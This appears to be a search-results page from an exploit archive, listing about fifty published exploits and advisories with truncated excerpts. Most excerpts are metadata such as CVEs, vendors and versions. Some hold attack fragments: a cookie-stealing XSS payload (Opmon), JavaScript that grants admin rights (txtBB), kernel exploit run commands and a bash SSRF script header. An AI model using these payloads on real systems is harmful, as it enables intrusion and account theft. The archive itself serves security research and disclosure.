39001 matches found
Fundraising Script 1.0 SQL Injection Vulnerability
Title: Fundraising Script-1.0 SQLi Author: nu11secur1ty Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/fundraising-script/sectionDemo Reference: https://portswigger.net/web-security/sql-injection Description: The cid parameter appears to be vulnerable to SQL injection...
PlayTube 3.0.1 Information Disclosure Vulnerability
Exploit Title: PlayTube 3.0.1 - Redirect Information Disclosure Exploit Author: CraCkEr Vendor: PlayTube Vendor Homepage: https://playtubescript.com/ Software Link: https://demo.playtubescript.com/ Tested on: Windows 10 Pro Impact: Sensitive Information Leakage CVE: CVE-2023-4714 CWE: CWE-200 -...
Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege / Remote Code Execution
Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. Author: nu11secur1ty Vendor: https://www.microsoft.com/ Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office Reference: https://portswigger.net/web-security/access-control CVE-2023-33148...
Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated) Exploit
Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload Unauthenticated Google Dork: n/a Exploit Author: Ramil Mustafayev Vendor Homepage: https://github.com/projectworldsofficial Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip Version: 1.0 Teste...
CD MP3 Terminator V2.07 Local Seh Exploit
Exploit Title: CD MP3 Terminator V2.07 Local Seh Exploit Date: 31.12.2022 Vendor Homepage: http://www.cdmp3terminator.com Software Link: https://www.softpedia.com/dyn-postdownload.php/7a9b28e4e4800cd04331f2f3df26259a/63b031ec/7084/4/2 Exploit Author: Achilles Tested Version: 2.07 Tested on: Windo...
Senayan Library Management System 9.1.1 SQL Injection Vulnerability
Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 SQLi Author: nu11secur1ty Vendor: https://slims.web.id/web/ Software: https://github.com/slims/slims9bulian/releases/download/v9.1.1/slims9bulian-9.1.1.zip Reference:...
Ruijie Reyee Mesh Router - Remote Code Execution (Authenticated) Exploit
Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution RCE Authenticated Google Dork: None Exploit Author: Minh Khoa of VSEC Vendor Homepage: https://ruijienetworks.com Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 Version: ReyeeOS 1.55.1915 - EW3.01B11P35 an...
Easy!Appointments < 1.4.3 - Information Disclosure Exploit
!/usr/bin/env ruby Exploit Title: Easy!Appointments 1.4.3 - Unauthenticated PII events disclosure Exploit author: noraj Alexandre ZANNI for ACCEIS https://www.acceis.fr Author website: https://pwn.by/noraj/ Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482 Vendor Homepage:...
Foxit PDF Editor 11.3.1 Arbitrary File Upload Vulnerability
Exploit Title: Foxit PDF Editor Arbitrary File Upload Unauthenticated Exploit Author: Saud Alenazi Vendor Homepage: https://www.foxit.com Software Link: https://apps.apple.com/us/app/foxit-pdf-editor/id507040546 Version: 11.3.1 Tested: iPhone 6 iOS 12.4.7 Contact: https://twitter.com/dmaral3noz -...
Shopmetrics Mystery Shopping Software Broken Access Control / XSS Vulnerability
======================================================================= title: Broken access control & Cross-Site Scripting product: Shopmetrics Mystery Shopping Software vulnerable version: SaaS platform before v21-11 fixed version: SaaS platform v21-11 CVE number: n/a for SaaS impact: Critical...
Support Board 3.3.4 - (Message) Stored Cross-Site Scripting Vulnerability
Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting XSS Exploit Author: John Jefferson Li Vendor Homepage: https://board.support/ Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 Version: 3.3.4 Tested on: Ubuntu 20.04.2 LTS, Windows 10 PO...
Linux Kernel 2.6.19 < 5.9 - (Netfilter) Local Privilege Escalation Exploit
/ CVE-2021-22555: Turning \x00\x00 into 10000$ by Andy Nguyen theflow@ theflow@theflow:$ gcc -m32 -static -o exploit exploit.c theflow@theflow:$ ./exploit + Linux Privilege Escalation by theflow@ - 2021 + STAGE 0: Initialization Setting up namespace sandbox... Initializing sockets and message...
FlashFXP 4.2.0 Build 1730 - Denial of Service Exploit
Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service PoC Vendor Homepage: https://www.flashfxp.com/ Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/ Exploit Author: Paras Bhatia Vulnerable Software: FlashFXP Version: 4.2.0 Build 1730 Vulnerability Type:...
PlaySMS 1.4 - import.php Authenticated CSV File Upload Code Execution Exploit
This Metasploit module exploits an authenticated file upload remote code execution vulnerability in PlaySMS version 1.4. This issue is caused by improper file contents handling in import.php aka the Phonebook import feature. Authenticated Users can upload a CSV file containing a malicious payload...
Websphere / JBoss / OpenNMS / Symantec - Java Deserialization Remote Code Execution
Exploit for multiple platform in category remote exploits ! /bin/bash/env python3 / | | | | | \ \ / \ '| |/ | |/ | / | '| | / | | | | | | | | || | | |/ || ||,||,|\/|| By Nikhil Sreekumar @roo7break Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code...
MagniComp SysInfo - mcsiwrapper Privilege Escalation Exploit
Exploit for multiple platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'MagniComp SysInfo mcsiwrapper Privilege Escalation', 'Description' = %q This module...
Wordpress Infocus2 Theme Arbitrary File Download Vulnerability
Exploit for php platform in category web applications Title : Wordpress Infocus2 Theme Arbitrary File Download Vulnerability Author : KillerX Date : 5/1/2015 KillerX Facebook : http://www.facebook.com/xXalreshyXx Ask : http://ask.fm/ALRESHY Twitter : https://twitter.com/killerx00x Email :...
Backdrop CMS 1.23.0 - Stored XSS Vulnerability
Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field Exploit Author: Sinem Şahin Vendor Homepage: https://backdropcms.org/ Version: 1.23.0 Tested on: Windows & XAMPP == Tutorial http://HOST/backdrop/node/add/post 2- Write your xss payload in the body of the post...
Saflok System 6000 Key Derivation Exploit
// Exploit Title: Saflok KDF // Vendor Homepage: https://www.dormakaba.com/ // Version: System 6000 // Tested on: Dormakaba Saflok cards // CVE: N/A include include define MAGICTABLESIZE 192 define KEYLENGTH 6 define UIDLENGTH 4 int mainint argc, char argv if argc != 2 printf"Usage: %s \n", argv0...
7 Sticky Notes v1.9 - OS Command Injection Vulnerability
Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection Discovered by: Ahmet Ümit BAYRAM Vendor Homepage: http://www.7stickynotes.com Software Link: http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe Tested Version: 1.9 latest Tested on: Windows 2019 Server 64bit Steps to Reproduce...
Saltstack Minion Payload Deployer Exploit
This Metasploit exploit module uses saltstack salt to deploy a payload and run it on all targets which have been selected default all. Currently only works against nix targets. This module requires Metasploit: https://metasploit.com/download Current source:...
Xitami 2.5 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: Xitami 2.5 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 14 january 2024 Vendor Homepage: https://imatix-legacy.github.io/xitami.com/ Download to demo:...
OutSystems Service Studio 11.53.30 - DLL Hijacking Vulnerability
Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia Vendor Homepage: https://www.outsystems.com/ Version: Up to 11.53.30 Build 61739 Tested on: Windows CVE : CVE-2022-47636 A DLL hijacking vulnerability has been...
Thruk Monitoring Web Interface 3.06 - Path Traversal Exploit
Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal Exploit Author: Galoget Latorre @galoget CVE: CVE-2023-34096 Galoget Latorre Vendor Homepage: https://thruk.org/ Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip Software Link + Exploit + PoC Backup:...
CloudPanel 2.2.2 Privilege Escalation / Path Traversal Exploit
CloudPanel versions 2.0.0 through 2.2.2 suffer from a privilege escalation vulnerability when a traversal is leveraged against clpctlWrapper for which all normal users have sudo access. Title : Privilege Escalation through path traversal CVE ID : CVE-2023-33747 Exploit Author : EagleEye Github :...
Enrollment System Project v1.0 - SQL Injection Authentication Bypass Vulnerability
Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass SQLI Exploit Author: VIVEK CHOUDHARY @sudovivek Version: V1.0 Tested on: Windows 10 Vendor Homepage: https://www.sourcecodester.com Software Link:...
WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting Vulnerability
Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting XSS Version: 1.6.1 Bugs: XSS Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/releases/tag/1.6.1 Date of found: 03-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical...
Opmon 9.11 - Cross-site Scripting Vulnerability
Exploit Title: Opmon 9.11 - Cross-site Scripting Exploit Author: p3tryx Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time Version: 9.11 Tested on: Chrome, IE and Firefox CVE : CVE-2021-43009 URL POC: alertdocument.cookie; var i=new Image;...
Linux Kernel < 4.14.8 Sign Extension Local Privilege Escalation Exploit
Linux kernel versions prior to 4.14.8 utilize the Berkeley Packet Filter BPF which contains a vulnerability where it may improperly perform signing for an extension. This can be utilized to escalate privileges. The target system must be compiled with BPF support and must not have...
osCommerce 2.3.4 - SQL Injection & Stored XSS Vulnerabilities
Exploit for php platform in category web applications Title: osCommerce 2.3.4 - SQL Injection & Stored XSS Date: 13.03.15 Affected versions: = 2.3.4 latest atm Vendor: oscommerce.com Tested on: Apache 2.2 / PHP 5.3 @ linux Contact: smash at devilteam.pl As disclosed before, you may create new...
SocialMPN Arbitrary File Injection Exploit
Exploit for unknown platform in category web applications ========================================== SocialMPN Arbitrary File Injection Exploit ========================================== !/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by...
Telerik Report Server Authentication Bypass / Remote Code Execution Exploit
This Metasploit module chains an authentication bypass vulnerability with a deserialization vulnerability to obtain remote code execution against Telerik Report Server versions 10.0.24.130 and below. The authentication bypass flaw allows an unauthenticated user to create a new user with...
StimulusReflex 3.5.0 Arbitrary Code Execution Exploit
StimulusReflex versions 3.5.0 up to and including 3.5.0.rc2 and 3.5.0.pre10 suffer from an arbitrary code execution vulnerability. StimulusReflex CVE-2024-28121 Arbitrary code execution in StimulusReflex. This affects version 3.5.0 up to and including 3.5.0.rc2 and v3.5.0.pre10. Vulnerable code...
Client Details System 1.0 - SQL Injection Vulnerability
Exploit Title: CVE-2023-7137ClientDetailsSystem-SQLInjection1 + Exploit Author: Hamdi Sevben + Vendor Homepage: https://code-projects.org/client-details-system-in-php-with-source-code/ + Software Link: https://download-media.code-projects.org/2020/01/CLIENTDETAILSSYSTEMINPHPWITHSOURCECODE.zip +...
Tosibox Key Service 3.3.0 Local Privilege Escalation / Unquoted Service Path Vulnerabilities
Tosibox Key Service versions 3.3.0 and below suffer from an unquoted search path issue impacting the service Tosibox Key Service for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. Tosibox Key...
Vinchin Backup And Recovery 7.2 Default Root Credentials Vulnerability
Vinchin Backup and Recovery version 7.2 has been identified as being configured with default root credentials, posing a significant security vulnerability. CVE ID: CVE-2024-22902 Title: Default Root Credentials Vulnerability in Vinchin Backup & Recovery v7.2 Suggested Description: Vinchin Backup ...
Request-Baskets v1.2.1 - Server-side request forgery Vulnerability
Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery SSRF Exploit Author: Iyaad Luqman K init6 Application: Request-Baskets v1.2.1 Tested on: Ubuntu 22.04 CVE: CVE-2023-27163 PoC !/bin/bash if "$" -lt 2 || "$1" = "-h" || "$1" = "--help" ; then help="Usage: exploit.sh \n\n";...
KodExplorer 4.49 - CSRF to Arbitrary File Upload Exploit
Exploit Title: KodExplorer ?php s...
WooCommerce v7.1.0 - Remote Code Execution Vulnerability
Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code ExecutionRCE Author: Milad Karimi Vendor Homepage: https://wordpress.org/plugins/woocommerce Software Link: https://wordpress.org/plugins/woocommerce Tested on: windows 10 , firefox Version: 7.1.0 CVE : N/A Description: simple, easy to use...
WordPress Quick Restaurant 2.0.2 XSS / CSRF / IDOR / Missing Authorization Vulnerabilities
On January 16, 2023, the Wordfence Threat Intelligence team responsibly disclosed several vulnerabilities in Quick Restaurant Menu, a WordPress plugin that allows users to set up restaurant menus on their sites. This plugin is vulnerable to missing authorization, insecure direct object reference,...
Engineers Online Portal 1.0 - File Upload Remote Code Execution Vulnerability
Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution RCE Exploit Author: SadKris Venor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html Version: 1.0 Tested on: XAMPP, Windows 11...
Macro Expert 4.7 - Unquoted Service Path Vulnerability
Exploit Title: Macro Expert 4.7 - Unquoted Service Path Exploit Author: Mert DAŞ Version: 3.11.8 Vendor Homepage: http://www.macro-expert.com/ Tested on: Windows 10 C:\Users\Mertsc qc "Macro Expert" SC QueryServiceConfig SUCCESS SERVICENAME: Macro Expert TYPE : 10 WIN32OWNPROCESS STARTTYPE : 2...
Student Quarterly Grading System 1.0 - (grade) Stored Cross-Site Scripting Vulnerability
Exploit Title: Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting XSS Exploit Author: Hüseyin Serkan Balkanli Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html Software Link:...
Geutebruck Remote Command Execution Exploit
This Metasploit module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and...
Sony BRAVIA Smart TV Denial Of Service Vulnerability
Sony BRAVIA Smart TV Denial Of Service ADVISORY INFORMATION TITLE: Two vulnerabilities found in Sony BRAVIA Smart TVs ADVISORY URL: CVE-2019-11889 https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-triggered-over-vulnerability-hbbtv-xl-19-014/ CVE-2019-11890...
Linux/ARM64 - execve(/bin/sh, [/bin/sh], NULL) Shellcode (48 Bytes)
/ Title: Linux/ARM64 - execve"/bin/sh", "/bin/sh", NULL Shellcode 48 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xer...
OCS Inventory NG ocsreports Shell Upload Vulnerability
OCS Inventory NG suffers from an ocsreports authenticated remote code execution vulnerability via a shell upload. OCS Inventory NG ocsreports Shell Upload Request 1 This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory. POST...
OOP CMS BLOG 1.0 - search SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: OOP CMS BLOG 1.0 - 'search' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://zsoft.com.bd/ Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blogforup.zip Version: 1.0 Category:...
GNU Screen 4.5.0 - Privilege Escalation Vulnerability
Exploit for linux platform in category local exploits Commit f86a374 "screen.c: adding permissions check for the logfile name", 2015-11-04 The check opens the logfile with full root privileges. This allows us to truncate any file or create a root-owned file with any contents in any directory and...
txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
Exploit for unknown platform in category web applications ================================================================= txtBB var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type',...